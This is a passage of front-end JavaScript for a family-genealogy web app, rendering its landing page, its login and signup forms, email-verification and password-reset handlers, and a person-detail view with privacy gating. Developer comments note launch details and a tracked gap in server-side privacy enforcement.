                        <div class="flex flex-wrap justify-center items-center gap-x-3 gap-y-1">
                            <a href="/privacy" class="landing-footer-link whitespace-nowrap py-2">Privacy</a>
                            <span class="text-gray-300 landing-footer-dot hidden sm:inline">·</span>
                            <a href="/terms" class="landing-footer-link whitespace-nowrap py-2">Terms</a>
                        </div>
                    </footer>
                </div>
            `;
        }

        // B34: applyActionCode is idempotent for verifyEmail — calling it once
        // marks the email verified; calling again on the same oobCode throws
        // auth/invalid-action-code. We treat that as a benign "already done"
        // state unless the user explicitly hits a refresh button.
        async function initVerifyEmailPage(oobCode) {
            const hintEl = document.getElementById('reset-email-hint');
            const titleEl = document.querySelector('.auth-centered-content h1');
            const successEl = document.getElementById('verify-success');
            const invalidEl = document.getElementById('reset-invalid');
            const reasonEl = document.getElementById('reset-invalid-reason');
            try {
                await applyActionCode(auth, oobCode);
                if (hintEl) hintEl.classList.add('hidden');
                if (titleEl) titleEl.textContent = 'Email verified';
                if (successEl) successEl.classList.remove('hidden');
            } catch (error) {
                console.error('applyActionCode (verifyEmail) error:', error);
                if (hintEl) hintEl.classList.add('hidden');
                if (titleEl) titleEl.textContent = "This link can't be used";
                if (successEl) successEl.classList.add('hidden');
                if (invalidEl) invalidEl.classList.remove('hidden');
                if (reasonEl) {
                    const code = error && error.code;
                    if (code === 'auth/expired-action-code') {
                        reasonEl.textContent = 'This verification link has expired. Sign in and request a new one.';
                    } else if (code === 'auth/invalid-action-code') {
                        reasonEl.textContent = 'This verification link is invalid or has already been used. Your email may already be verified — try signing in.';
                    } else if (code === 'auth/user-disabled') {
                        reasonEl.textContent = 'This account has been disabled. Contact support if this is a mistake.';
                    } else if (code === 'auth/user-not-found') {
                        reasonEl.textContent = 'This account no longer exists.';
                    }
                }
            }
        }

        async function initResetPasswordPage(oobCode) {
            const hintEl = document.getElementById('reset-email-hint');
            const formEl = document.getElementById('reset-password-form');
            const invalidEl = document.getElementById('reset-invalid');
            const reasonEl = document.getElementById('reset-invalid-reason');
            try {
                const email = await verifyPasswordResetCode(auth, oobCode);
                if (hintEl) hintEl.textContent = `Resetting password for ${email}`;
                if (formEl) {
                    formEl.classList.remove('hidden');
                    formEl.addEventListener('submit', (e) => handleResetPasswordSubmit(e, oobCode));
                }
            } catch (error) {
                console.error('verifyPasswordResetCode error:', error);
                if (hintEl) hintEl.classList.add('hidden');
                if (formEl) formEl.classList.add('hidden');
                if (invalidEl) invalidEl.classList.remove('hidden');
                if (reasonEl) {
                    const code = error && error.code;
                    if (code === 'auth/expired-action-code') {
                        reasonEl.textContent = 'This link has expired. Request a new one from the login page.';
                    } else if (code === 'auth/invalid-action-code') {
                        reasonEl.textContent = 'This link is invalid or has already been used. Request a new one from the login page.';
                    } else if (code === 'auth/user-disabled') {
                        reasonEl.textContent = 'This account has been disabled. Contact support if this is a mistake.';
                    } else if (code === 'auth/user-not-found') {
                        reasonEl.textContent = 'This account no longer exists.';
                    }
                }
            }
        }

        async function handleResetPasswordSubmit(event, oobCode) {
            event.preventDefault();
            const newPass = document.getElementById('reset-new-password').value;
            const confirmPass = document.getElementById('reset-confirm-password').value;
            const errorEl = document.getElementById('reset-error');
            const submitBtn = document.getElementById('reset-submit-btn');
            errorEl.textContent = '';

            if (newPass !== confirmPass) {
                errorEl.textContent = "Passwords don't match.";
                return;
            }
            if (newPass.length < 10) {
                errorEl.textContent = 'Password must be at least 10 characters.';
                return;
            }

            if (submitBtn) {
                submitBtn.disabled = true;
                submitBtn.textContent = 'Setting new password…';
            }

            try {
                await confirmPasswordReset(auth, oobCode, newPass);
                document.getElementById('reset-password-form').classList.add('hidden');
                document.getElementById('reset-success').classList.remove('hidden');
                const hintEl = document.getElementById('reset-email-hint');
                if (hintEl) hintEl.classList.add('hidden');
                const titleEl = document.querySelector('.auth-centered-content h1');
                if (titleEl) titleEl.textContent = 'You\'re all set';
            } catch (error) {
                console.error('confirmPasswordReset error:', error);
                if (submitBtn) {
                    submitBtn.disabled = false;
                    submitBtn.textContent = 'Set new password';
                }
                const code = error && error.code;
                if (code === 'auth/expired-action-code') {
                    errorEl.textContent = 'This link has expired. Request a new one from the login page.';
                } else if (code === 'auth/invalid-action-code') {
                    errorEl.textContent = 'This link is invalid or has already been used.';
                } else if (code === 'auth/weak-password') {
                    errorEl.textContent = 'Password is too weak. Please choose something stronger.';
                } else {
                    errorEl.textContent = 'Could not reset password. Please try again.';
                }
            }
        }

        // Internal SPA navigation between path-routed surfaces (/, /login,
        // /auth/action). Replaces full-page <a href="/..."> clicks with
        // history.pushState + renderApp so the browser doesn't reload the
        // bundle and reinitialize Firebase Auth on every Sign in click.
        // Static legal pages (/privacy, /terms, /data-deletion) intentionally
        // stay as full <a href> navigations — they're emitted as standalone
        // HTML by the Vite legal-pages plugin.
        function navigateToPath(path) {
            // Signed-in users clicking Sign in (e.g. via the Landing or a
            // header link) shouldn't see a flash of the AuthPage before
            // being kicked back to dashboard. Short-circuit the URL change
            // and just keep them where they are.
            if ((path === '/login' || path.startsWith('/login?')) && appState.isAuthenticated) {
                path = '/';
            }
            window.history.pushState({}, '', path);
            renderApp();
        }

        // Phase B landing for the apex consolidation work (LAUNCH-READINESS
        // item 16). Real copy + imagery on top of the Phase A routing. Split
        // hero on desktop (content left, family photo right), stacked on
        // mobile. CSS for .landing-* classes lives in main.css.
        function Landing() {
            return `
                <div class="landing-page">
                    <header class="landing-header">
                        <a href="/" onclick="event.preventDefault(); navigateToPath('/');" class="landing-logo-link">
                            <img src="/ebiwawa-logo.svg" alt="Ebiwawa" class="landing-logo">
                        </a>
                        <!-- Quiet sign-in for existing users; waitlist stays
                             the dominant CTA. Same destination as the
                             footer "Already a member? Sign in →" link. -->
                        <a href="/login" onclick="event.preventDefault(); navigateToPath('/login');" class="landing-signin-link">Sign in</a>
                    </header>

                    <main class="landing-hero">
                        <div class="landing-collage">
                            <div class="landing-collage-photo landing-collage-1"><img src="/images/family-collage-1.jpg" alt="A young African couple in traditional dress carrying their infant on the mother's back"></div>
                            <div class="landing-collage-photo landing-collage-2"><img src="/images/family-collage-2.jpg" alt="Two women sharing a smile on a porch"></div>
                            <div class="landing-collage-photo landing-collage-3"><img src="/images/family-collage-3.jpg" alt="A multi-generational family portrait outdoors"></div>
                            <div class="landing-collage-photo landing-collage-4"><img src="/images/family-collage-4.jpg" alt="A daughter embracing her elderly father from behind"></div>
                            <img src="/images/graphic-dots.png" alt="" class="landing-collage-dots" aria-hidden="true">
                        </div>
                        <div class="landing-hero-content">
                            <!-- F1 controlled break: two sentences on separate
                                 lines; display:block on each sentence
                                 keeps it as a wrap unit so "started"
                                 can't strand alone on desktop. F2 accent:
                                 payoff sentence in --ebw-accent-ink. -->
                            <h1 class="landing-headline">
                                <span class="landing-headline-line">Your family's story started&nbsp;generations ago.</span>
                                <span class="landing-headline-line landing-headline-accent">Bring it home.</span>
                            </h1>
                            <p class="landing-lead">
                                Built for African families and the diaspora — the photos, the names, the lineage, all in one safe place.
                            </p>
                            <!-- 2026-10-26 LAUNCH-DAY HERO CTA. Public signup
                                 button replaces the invite-only waitlist form.
                                 Branch: launch-day-cta-swap. Reviewed on staging
                                 2026-10-12. Merge to main + deploy on 2026-10-26
                                 as part of the F1.2 frontend bundle per runbook.
                                 Keep this comment block through 1 month post-
                                 launch so a future maintainer sees the context. -->
                            <div class="landing-signup-cta">
                                <a href="/signup"
                                   onclick="event.preventDefault(); navigateToPath('/signup');"
                                   class="btn btn-primary landing-signup-btn">
                                    Sign up free
                                </a>
                                <p class="landing-signup-sub">
                                    It's free, and it stays private to the family you build.
                                </p>
                            </div>
                        </div>
                    </main>

                    <footer class="landing-footer">
                        <!-- Mobile stack: links row → copyright → sign-in.
                             Each link whitespace-nowrap so individual link
                             text never splits mid-word. py-2 gives ≥44px
                             tap-target height on each. -->
                        <div class="sm:hidden flex flex-col items-center gap-3">
                            <nav class="flex flex-wrap justify-center items-center gap-x-4 gap-y-1">
                                <a href="/about" class="landing-footer-link whitespace-nowrap py-2">About</a>
                                <a href="/help" class="landing-footer-link whitespace-nowrap py-2">Help</a>
                                <a href="/privacy" class="landing-footer-link whitespace-nowrap py-2">Privacy</a>
                                <a href="/terms" class="landing-footer-link whitespace-nowrap py-2">Terms</a>
                            </nav>
                            <span class="text-xs text-gray-400">© ${new Date().getFullYear()} Ebiwawa, Inc.</span>
                            <a href="/login" onclick="event.preventDefault(); navigateToPath('/login');" class="landing-footer-link whitespace-nowrap py-2">Already a member? Sign in →</a>
                        </div>
                        <!-- Desktop inline: unchanged from prior. -->
                        <div class="hidden sm:block landing-footer-inner">
                            <span>© ${new Date().getFullYear()} Ebiwawa, Inc.</span>
                            <span class="landing-footer-dot">·</span>
                            <a href="/about">About</a>
                            <span class="landing-footer-dot">·</span>
                            <a href="/help">Help</a>
                            <span class="landing-footer-dot">·</span>
                            <a href="/privacy">Privacy</a>
                            <span class="landing-footer-dot">·</span>
                            <a href="/terms">Terms</a>
                            <span class="landing-footer-dot">·</span>
                            <a href="/login" onclick="event.preventDefault(); navigateToPath('/login');">Already a member? Sign in →</a>
                        </div>
                    </footer>
                </div>
            `;
        }

        // 2026-10-25: handleWaitlistSubmit DELETED. Landing waitlist form was
        // swapped to "Sign up free" button in commit db05115 (2026-10-16);
        // the handler was left in-source for a potential rollback but was
        // actually dead — no DOM element called it, no onsubmit handler
        // referenced it, and the window export (removed below) was the only
        // ambient reference. Removed to kill the two-CTAs-in-one-bundle risk
        // ("waitlist form someone can still submit after launch"). Backend
        // `POST /waitlist` is still live and reachable via index-static.html
        // + any stale bookmark, so this is a frontend-only cleanup — no
        // backend change needed. If a future landing variant needs waitlist
        // signup, re-add from git history (b7dedc1^).

        function AuthPage() {
            return `
                <div class="auth-centered-layout">
                    <div class="auth-centered-content">
                        <div class="auth-form-container">
                            <div class="text-center mb-4">
                                <img src="ebiwawa-logo.svg" alt="Ebiwawa" class="mx-auto mb-2 auth-logo" style="object-fit: contain;">
                                <!-- Positioning line — placeholder pending refinement. Goal: one line
                                     that references oral lineage / African heritage / family stories,
                                     not generic family-tree-app copy. -->
                                <p class="auth-tagline" style="font-family: 'Outfit', sans-serif;">
                                    Welcome home. Your family's story starts here.
                                </p>
                            </div>

                            ${FEATURES.signupTabVisible ? `
                            <!-- Tab Switcher (hidden during invite-only — see FEATURES.signupTabVisible) -->
                            <div class="flex border-b mb-6" style="border-color: rgba(252, 171, 16, 0.2);">
                                <button id="login-tab" onclick="switchAuthTab('login')" class="auth-tab flex-1 py-3 text-center font-semibold border-b-3 transition-all" style="border-bottom: 3px solid #FCAB10; color: #FCAB10; font-family: 'Outfit', sans-serif;">
                                    Login
                                </button>
                                <button id="signup-tab" onclick="switchAuthTab('signup')" class="auth-tab flex-1 py-3 text-center font-semibold text-gray-500 hover:text-gray-700 transition-all" style="font-family: 'Outfit', sans-serif;">
                                    Sign Up
                                </button>
                            </div>
                            ` : ''}

                            <!-- Login Form -->
                            <div id="login-form-container">
                                <form id="login-form" class="space-y-3">
                                    <div>
                                        <label for="login-email" class="block text-sm font-medium text-gray-700">Email</label>
                                        <input id="login-email" type="email" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <div class="flex items-baseline justify-between">
                                            <label for="login-password" class="block text-sm font-medium text-gray-700">Password</label>
                                            <a href="#" onclick="handleForgotPassword(event)" class="text-xs text-primary hover:underline">Forgot password?</a>
                                        </div>
                                        <input id="login-password" type="password" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div id="login-error" class="text-sm text-center form-error"></div>
                                    <button type="submit" class="btn btn-primary w-full">
                                        Log In
                                    </button>
                                </form>
                            </div>

                            <!-- Signup Form (always present in DOM so switchAuthTab works;
                                 visible only when the user clicks the "Have an invite code?"
                                 link below or when FEATURES.signupTabVisible flips on for
                                 public launch) -->
                            <div id="signup-form-container" class="hidden">
                                <form id="signup-form" class="space-y-4">
                                    ${!FEATURES.signupTabVisible ? `
                                    <div class="rounded-md border border-yellow-300 bg-yellow-50 p-3 text-sm text-yellow-900">
                                        <p class="font-semibold mb-1">Invite-only platform</p>
                                        <p class="text-xs">
                                            Ebiwawa is in invite-only beta. Please sign up using the email address that received your invitation — using a different address may prevent your family from finding you.
                                        </p>
                                    </div>
                                    ` : ''}
                                    <!-- Q5: populated by hydrateInviteContext when ?invite=TOKEN is present -->
                                    <div id="signup-invite-banner" class="hidden"></div>
                                    <div>
                                        <label for="signup-email" class="block text-sm font-medium text-gray-700">Email</label>
                                        <input id="signup-email" type="email" required class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                        <p class="text-xs text-gray-500 mt-1">We'll use this for login and account recovery</p>
                                    </div>
                                    <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                                        <div>
                                            <label class="block text-sm font-medium text-gray-700">First Name *</label>
                                            <input type="text" id="signup-first-name" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" minlength="2">
                                        </div>
                                        <div>
                                            <label class="block text-sm font-medium text-gray-700">Last Name *</label>
                                            <input type="text" id="signup-last-name" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" minlength="2">
                                        </div>
                                    </div>
                                    <div>
                                        <label class="block text-sm font-medium text-gray-700">Middle Name (Optional)</label>
                                        <input type="text" id="signup-middle-name" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <div class="flex items-baseline justify-between">
                                            <label for="signup-password" class="block text-sm font-medium text-gray-700">Password</label>
                                            <button type="button" onclick="suggestStrongPassword()" class="text-xs text-primary hover:underline">Suggest strong password</button>
                                        </div>
                                        <div class="relative mt-1">
                                            <input id="signup-password" type="password" required minlength="10" class="w-full px-3 py-2 pr-16 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                            <button type="button" onclick="toggleSignupPasswordVisibility()" id="signup-password-toggle" class="absolute right-2 top-1/2 -translate-y-1/2 text-xs text-gray-500 hover:text-primary px-2 py-1 rounded" aria-label="Show password">Show</button>
                                        </div>
                                        <p class="text-xs text-gray-500 mt-1">At least 10 characters. A mix of letters, numbers, and a symbol is best — passphrases work well.</p>
                                    </div>
                                    <div>
                                        <label for="signup-confirm-password" class="block text-sm font-medium text-gray-700">Confirm Password</label>
                                        <input id="signup-confirm-password" type="password" required minlength="10" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div id="signup-error" class="text-sm text-center form-error"></div>
                                    <button type="submit" class="btn btn-primary w-full">
                                        Create Account & Continue
                                    </button>
                                    ${!FEATURES.signupTabVisible ? `
                                    <p class="text-center text-xs text-gray-500 pt-2">
                                        Already have an account?
                                        <a href="#" onclick="event.preventDefault(); switchAuthTab('login');" class="text-primary font-medium hover:underline">Back to login</a>
                                    </p>
                                    ` : ''}
                                </form>
                            </div>

                            <!-- Divider -->
                            <div class="relative mt-4">
                                <div class="absolute inset-0 flex items-center">
                                    <div class="w-full border-t border-gray-300"></div>
                                </div>
                                <div class="relative flex justify-center text-sm">
                                    <span class="px-2 bg-white text-gray-500">Or continue with</span>
                                </div>
                            </div>

                            <!-- Social Login Buttons -->
                            <div class="space-y-3 mt-3">
                                <button id="google-signin-btn" onclick="signInWithGoogle()" class="w-full flex items-center justify-center px-4 py-3 border border-gray-300 rounded-lg hover:bg-gray-50 hover:border-gray-400 transition-all duration-200 active:scale-[0.98]">
                                    <svg id="google-icon" class="w-5 h-5 mr-2" viewBox="0 0 48 48"><path fill="#EA4335" d="M24 9.5c3.54 0 6.71 1.22 9.21 3.6l6.85-6.85C35.9 2.38 30.47 0 24 0 14.62 0 6.51 5.38 2.56 13.22l7.98 6.19C12.43 13.72 17.74 9.5 24 9.5z"/><path fill="#4285F4" d="M46.98 24.55c0-1.57-.15-3.09-.38-4.55H24v9.02h12.94c-.58 2.96-2.26 5.48-4.78 7.18l7.73 6c4.51-4.18 7.09-10.36 7.09-17.65z"/><path fill="#FBBC05" d="M10.53 28.59c-.48-1.45-.76-2.99-.76-4.59s.27-3.14.76-4.59l-7.98-6.19C.92 16.46 0 20.12 0 24c0 3.88.92 7.54 2.56 10.78l7.97-6.19z"/><path fill="#34A853" d="M24 48c6.48 0 11.93-2.13 15.89-5.81l-7.73-6c-2.15 1.45-4.92 2.3-8.16 2.3-6.26 0-11.57-4.22-13.47-9.91l-7.98 6.19C6.51 42.62 14.62 48 24 48z"/></svg>
                                    <span id="google-signin-text" class="text-gray-700 font-medium">Continue with Google</span>
                                    <svg id="google-spinner" class="hidden animate-spin ml-2 h-4 w-4 text-gray-500" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle><path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path></svg>
                                </button>
                                ${FEATURES.facebookSignIn ? `
                                <button id="facebook-signin-btn" onclick="signInWithFacebook()" class="w-full flex items-center justify-center px-4 py-3 border border-gray-300 rounded-lg hover:bg-gray-50 hover:border-gray-400 transition-all duration-200 active:scale-[0.98]">
                                    <svg id="facebook-icon" class="w-5 h-5 mr-2" fill="#1877F2" viewBox="0 0 24 24"><path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z"/></svg>
                                    <span id="facebook-signin-text" class="text-gray-700 font-medium">Continue with Facebook</span>
                                    <svg id="facebook-spinner" class="hidden animate-spin ml-2 h-4 w-4 text-gray-500" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle><path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path></svg>
                                </button>
                                ` : ''}
                                ${FEATURES.phoneSignIn ? `
                                <button id="phone-signin-btn" onclick="openPhoneSignupModal()" class="w-full flex items-center justify-center px-4 py-3 border border-gray-300 rounded-lg hover:bg-gray-50 hover:border-gray-400 transition-all duration-200 active:scale-[0.98]">
                                    <svg class="w-5 h-5 mr-2" viewBox="0 0 24 24" fill="none" stroke="#4B3A2A" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"/></svg>
                                    <span class="text-gray-700 font-medium">Continue with phone</span>
                                </button>
                                ` : ''}
                            </div>

                            ${!FEATURES.signupTabVisible ? `
                            <p id="invite-code-prompt" class="text-center text-xs text-gray-500 mt-4">
                                Have an invite code?
                                <a href="#" onclick="event.preventDefault(); switchAuthTab('signup');" class="text-primary font-medium hover:underline">Create your account</a>
                            </p>
                            ` : ''}
                        </div>
                    </div>

                    <!-- Page footer — true bottom-of-viewport position, not embedded in the form.
                         "Delete my data" intentionally NOT here: this is a sign-in moment, not a
                         delete moment. The deletion process remains discoverable via the legal
                         pages footer (linked here) and via the in-app Profile → Privacy & Data
                         card once the user is signed in. -->
                    <footer class="auth-page-footer">
                        <div class="flex flex-wrap justify-center items-center gap-x-3 gap-y-1">
                            <a href="/privacy" class="landing-footer-link whitespace-nowrap py-2 hover:underline">Privacy Policy</a>
                            <span class="text-gray-300 landing-footer-dot hidden sm:inline">·</span>
                            <a href="/terms" class="landing-footer-link whitespace-nowrap py-2 hover:underline">Terms of Service</a>
                        </div>
                    </footer>
                </div>
            `;
        }

        function PersonDetailPage(person) {
            // Phase 3: gate private profiles at the detail view. Non-owner sees
            // banner + gated fields. Owner sees full data plus "Only you can
            // see this" markers next to each field others can't see (Phase 3
            // Session 2 self-view treatment).
            //
            // The `person` param comes from the navigation state — which was
            // captured whenever the user opened this page. If the privacy_mode
            // changed since (via the Settings toggle), the passed-in object is
            // stale. Look up the fresh Person from appState.treeData.persons
            // (the ebw:privacy-changed listener patches that cache) so the
            // page reflects the latest state without a full reload.
            const freshPerson = (appState.treeData && Array.isArray(appState.treeData.persons))
                ? appState.treeData.persons.find(p => p && p.id === person.id)
                : null;
            if (freshPerson) {
                // Merge the fresh privacy_mode + claimed_by_user_id + is_alive
                // onto the passed-in object. Keep the passed-in object as the
                // fallback base so any fields that only exist on the nav-state
                // shape (e.g., relationships attached at click time) still work.
                person = Object.assign({}, person, freshPerson);
            }
            const viewerUserId = appState.currentUserNeo4jId;
            const isOwner = person.claimed_by_user_id != null
                && person.claimed_by_user_id === viewerUserId;
            // Stewardship basis for Phase 3 §5 field-level privacy. Reads
            // person.created_by (audit provenance). Do NOT read for request-
            // level resource access — tree membership is that basis.
            const isCreatorOfDeceased = person.is_alive === false
                && person.created_by === viewerUserId;
            const controlOpts = { viewerUserId, viewerControlsDeceased: isCreatorOfDeceased };
            const showDates = canViewField(null, person, 'dates', controlOpts);
            const showLocation = canViewField(null, person, 'location', controlOpts);
            const showOccupation = canViewField(null, person, 'occupation', controlOpts);
            const showContact = canViewField(null, person, 'contact', controlOpts);
            const showBio = canViewField(null, person, 'bio', controlOpts);
            const isHiddenByPrivacy = personIsPrivate(person) && !isOwner && !isCreatorOfDeceased;
            // R1 (resource access): the Edit affordance follows backend
            // assert_tree_member — any MANAGES role on the tree. Prior shape
            // (showEdit = isOwner || isCreatorOfDeceased) was stricter than
            // the backend update_person_in_tree gate, which admits any tree
            // member, and so hid Edit for tree creators on Persons that
            // happened to be missing created_by (data gap on 13 of 15
            // Persons pre-2026-10-24). See CLAUDE.md 2026-10-24 Finding 1
            // + ARCHITECTURE.md §4.5 R1.
            const isTreeMember = _viewerIsTreeMember(appState.currentTreeId);
            // UI consistency, not a privacy control. Field-level privacy on
            // Persons is presentation-only: GET /trees/<id>/persons returns
            // unfiltered nodes and the Edit modal pre-fills from the browser-
            // cached person object, so any tree member already holds every
            // field client-side. This conjunct keeps the Edit affordance from
            // contradicting the read view; it does not prevent access to the
            // data. Real enforcement requires server-side field filtering —
            // see SECURITY-SCAN.md open item (field privacy unenforced).
            const showEdit = isTreeMember && !isHiddenByPrivacy;
            // Phase 3 fix: viewer can toggle privacy on a deceased Person if
            // they are its creator OR the tree's creator (per brief §5).
            // Owner path (living Person) is handled by the Settings row on
            // Profile — no duplicate control here.
            const isTreeCreator = Array.isArray(appState.myTrees)
                && appState.myTrees.some(t =>
                    t && t.tree && t.tree.id === appState.currentTreeId && t.role === 'creator');
            const canManageDeceasedPrivacy = person.is_alive === false
                && (isCreatorOfDeceased || isTreeCreator)
                && !isOwner;
            const isSelfViewingPrivate = personIsPrivate(person) && isOwner;
            const onlyYouTag = isSelfViewingPrivate
                ? ' <span class="ebw-only-you"><svg class="ebw-lock-glyph" viewBox="0 0 24 24" width="9" height="9" aria-hidden="true"><path fill="currentColor" d="M12 2a5 5 0 00-5 5v3H6a2 2 0 00-2 2v8a2 2 0 002 2h12a2 2 0 002-2v-8a2 2 0 00-2-2h-1V7a5 5 0 00-5-5zm-3 8V7a3 3 0 116 0v3H9z"/></svg> Only you can see this</span>'
                : '';
            return `
                <div id="person-detail-view" data-view>
                    <div class="flex items-center mb-6">
                        <button onclick="navigateToView('family-tree-view')" class="text-primary hover:underline">&larr; Back to Family Tree</button>
                    </div>

                    <!-- Person Info -->
                    <div class="bg-white rounded-lg shadow-md p-6 mb-6">
                        <div class="flex items-start justify-between">
                            <div class="flex-1">
                                <h2 class="text-3xl font-bold mb-2">${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}</h2>
                                ${isHiddenByPrivacy ? `
                                    <div class="mt-3 flex items-start gap-2 p-3 rounded-md bg-gray-50 border border-gray-200 text-sm text-gray-600">
                                        <svg class="ebw-lock-glyph mt-0.5" viewBox="0 0 24 24" width="14" height="14" aria-hidden="true"><path fill="currentColor" d="M12 2a5 5 0 00-5 5v3H6a2 2 0 00-2 2v8a2 2 0 002 2h12a2 2 0 002-2v-8a2 2 0 00-2-2h-1V7a5 5 0 00-5-5zm-3 8V7a3 3 0 116 0v3H9z"/></svg>
                                        <div>
                                            <div class="font-medium text-gray-800">This profile is private.</div>
                                            <div class="mt-1">Only their name and relationship are visible. ${person.is_alive === false ? 'You can <button onclick="openPrivacyChangeRequest(' + person.id + ')" class="text-primary hover:underline">request a change</button>.' : ''}</div>
                                        </div>
                                    </div>
                                ` : ''}
                                ${isSelfViewingPrivate ? `
                                    <div class="mt-3 flex items-start gap-2 p-3 rounded-md ebw-self-private-banner text-sm">
                                        <svg class="ebw-lock-glyph mt-0.5" viewBox="0 0 24 24" width="14" height="14" aria-hidden="true"><path fill="currentColor" d="M12 2a5 5 0 00-5 5v3H6a2 2 0 00-2 2v8a2 2 0 002 2h12a2 2 0 002-2v-8a2 2 0 00-2-2h-1V7a5 5 0 00-5-5zm-3 8V7a3 3 0 116 0v3H9z"/></svg>
                                        <div>
                                            <div class="font-medium">Your profile is private.</div>
                                            <div class="mt-1">You see everything below; other family members see only your name and relationship. Change this in <a href="#" onclick="navigateToView('profile-view'); return false;" class="text-primary hover:underline">Settings → Manage privacy</a>.</div>
                                        </div>
                                    </div>
                                ` : ''}
                                <div class="grid grid-cols-1 md:grid-cols-2 gap-3 text-sm text-gray-600 mt-3">
                                    ${showDates && (person.birth_year || person.birth_month || person.birth_day) ? `
                                        <div><strong>Born:</strong> ${[person.birth_month, person.birth_day, person.birth_year].filter(Boolean).join('/')}${showLocation && person.birth_place ? ` in ${escapeHtml(person.birth_place)}` : ''}${onlyYouTag}</div>
                                    ` : ''}
                                    ${showDates && !person.is_alive && (person.death_year || person.death_month || person.death_day) ? `
                                        <div><strong>Died:</strong> ${[person.death_month, person.death_day, person.death_year].filter(Boolean).join('/')}${showLocation && person.death_place ? ` in ${escapeHtml(person.death_place)}` : ''}${onlyYouTag}</div>
                                    ` : ''}
                                    ${showDates && person.gender ? `<div><strong>Gender:</strong> ${escapeHtml(person.gender.charAt(0).toUpperCase() + person.gender.slice(1))}${onlyYouTag}</div>` : ''}
                                    ${showLocation && person.current_location ? `<div><strong>Location:</strong> ${escapeHtml(person.current_location)}${onlyYouTag}</div>` : ''}
                                    ${showOccupation && person.occupation ? `<div><strong>Occupation:</strong> ${escapeHtml(person.occupation)}${onlyYouTag}</div>` : ''}
                                    ${showContact && person.email ? `<div><strong>Email:</strong> <a href="mailto:${encodeURIComponent(person.email)}" class="text-primary hover:underline">${escapeHtml(person.email)}</a>${onlyYouTag}</div>` : ''}
                                    ${showContact && person.phone ? `<div><strong>Phone:</strong> <a href="tel:${escapeHtml(person.phone)}" class="text-primary hover:underline">${escapeHtml(person.phone)}</a>${onlyYouTag}</div>` : ''}
                                </div>
                                ${showBio && person.bio ? `
                                    <div class="mt-4 pt-4 border-t border-gray-200">
                                        <strong class="text-sm text-gray-700">Biography${onlyYouTag}:</strong>
                                        <p class="mt-2 text-sm text-gray-600 whitespace-pre-wrap">${escapeHtml(person.bio)}</p>
                                    </div>
                                ` : ''}
                            </div>
                            <div class="ml-4 flex gap-2">
                                ${showEdit ? `
                                <button onclick="openEditPersonModal(${JSON.stringify(person).replace(/"/g, '&quot;')})"
                                        class="px-4 py-2 text-sm font-semibold text-white rounded-md bg-secondary hover:bg-opacity-90">
                                    Edit Person
                                </button>
                                ` : ''}
                                ${showEdit && FEATURES.storyGenerator ? `
                                <button onclick="generateAIStory(${person.id}, ${appState.currentTreeId || 'null'})"
                                        class="px-4 py-2 text-sm font-semibold text-white rounded-md bg-purple-600 hover:bg-purple-700">
                                    Generate Story
                                </button>
                                ` : ''}
                            </div>
                        </div>

                        <!-- AI Story Container -->
                        <div id="ai-story-container" class="hidden mt-4 pt-4 border-t border-gray-200">
                            <strong class="text-sm text-purple-700">AI-Generated Story:</strong>
                            <div id="ai-story-content" class="mt-2"></div>
                        </div>
                    </div>

                    ${canManageDeceasedPrivacy ? renderDeceasedPrivacyCard(person) : ''}

                    <!-- Trust Score Section -->
                    <div class="mt-6 bg-white rounded-lg shadow-md p-6">
                        <div id="trust-info-container">
                            <p class="text-gray-400 text-sm animate-pulse">Loading trust info...</p>
                        </div>
                    </div>

                    <!-- Relationships Section -->
                    <div class="mt-6 bg-white rounded-lg shadow-md p-6">
                        <div class="flex items-center justify-between mb-4">
                            <h3 class="text-xl font-semibold">Relationships</h3>
                            <button onclick="openAddRelationshipModalForPerson('${person.id}')" class="px-4 py-2 text-sm font-semibold text-white rounded-md bg-primary hover:bg-opacity-90">
                                + Add Relationship
                            </button>
                        </div>
                        <div id="person-relationships" class="space-y-4">
                            <p class="text-gray-500">Loading relationships...</p>
                        </div>
                    </div>

